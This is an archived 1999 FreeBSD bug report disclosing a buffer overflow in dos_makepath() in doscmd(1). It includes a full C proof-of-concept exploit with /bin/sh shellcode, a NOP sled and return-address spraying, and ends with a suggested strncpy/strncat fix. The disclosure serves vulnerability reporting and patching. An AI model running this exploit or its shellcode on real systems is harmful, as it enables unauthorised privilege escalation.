Date: 20 Dec 1999 18:54:51 -0000 From: venglin@lagoon.FreeBSD.lublin.pl To: FreeBSD-gnats-submit@freebsd.org Subject: bin/15593: [SECURITY] ustrcpy() buffer overflow in doscmd(1) Message-ID: <19991220185451.99398.qmail@lagoon.FreeBSD.lublin.pl>
next in thread | raw e-mail | index | archive | help
>Number: 15593
>Category: bin
>Synopsis: [SECURITY] ustrcpy() buffer overflow in doscmd(1)
>Confidential: no
>Severity: non-critical
>Priority: medium
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Mon Dec 20 11:00:01 PST 1999
>Closed-Date:
>Last-Modified:
>Originator: Przemyslaw Frasunek
>Release: FreeBSD 3.4-STABLE i386
>Organization:
Lublin BSD Users Group
>Environment:
FreeBSD lagoon.FreeBSD.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #0: Sat Dec 18 17:37:37 CET 1999 root@:/usr/sys/compile/LAGOON i386
>Description:
It is possible to gain extra privileges by overflowing buffer in
dos_makepath().
doscmd(1) is NOT suid/sgid by default.
>How-To-Repeat:
/*
*
* (c) 1999 babcia padlina ltd. <babunia@FreeBSD.lublin.pl>
* FreeBSD /usr/bin/doscmd exploit.
*
*/
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define BUFSIZE 1000
#define ADDRS 1200
long getesp(void)
{
__asm__("movl %esp, %eax\n");
}
int main(argc, argv)
int argc;
char **argv;
{
char *execshell =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
char *buf, *p;
int noplen, i, ofs, align;
long ret, *ap;
if(!(buf = (char *)malloc(BUFSIZE+1)))
{
perror("malloc()");
return -1;
}
if (argc < 3) { fprintf(stderr, "usage: %s ofs align\n", argv[0]); exit(0); }
ofs = atoi(argv[1]);
align = atoi(argv[2]);
noplen = BUFSIZE - strlen(execshell);
ret = getesp() + ofs;
memset(buf, NOP, noplen);
buf[noplen+1] = '\0';
strcat(buf, execshell);
setenv("EGG", buf, 1);
free(buf);
if(!(buf = (char *)malloc(ADDRS+align+1)))
{
perror("malloc()");
return -1;
}
memset(buf, 'a', align);
p = &buf[align];
ap = (unsigned long *)p;
for(i = 0; i < ADDRS / 4; i++)
*ap++ = ret;
p = (char *)ap;
*p = '\0';
fprintf(stderr, "ret: 0x%x\n", ret);
execl("/usr/bin/doscmd", "doscmd", buf, 0);
return 0;
}
>Fix:
Replace ustrcpy() and ustrcat() with strncpy() and strncat()
in cwd.c:232.
>Release-Note:
>Audit-Trail:
>Unformatted:
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-bugs" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19991220185451.99398.qmail>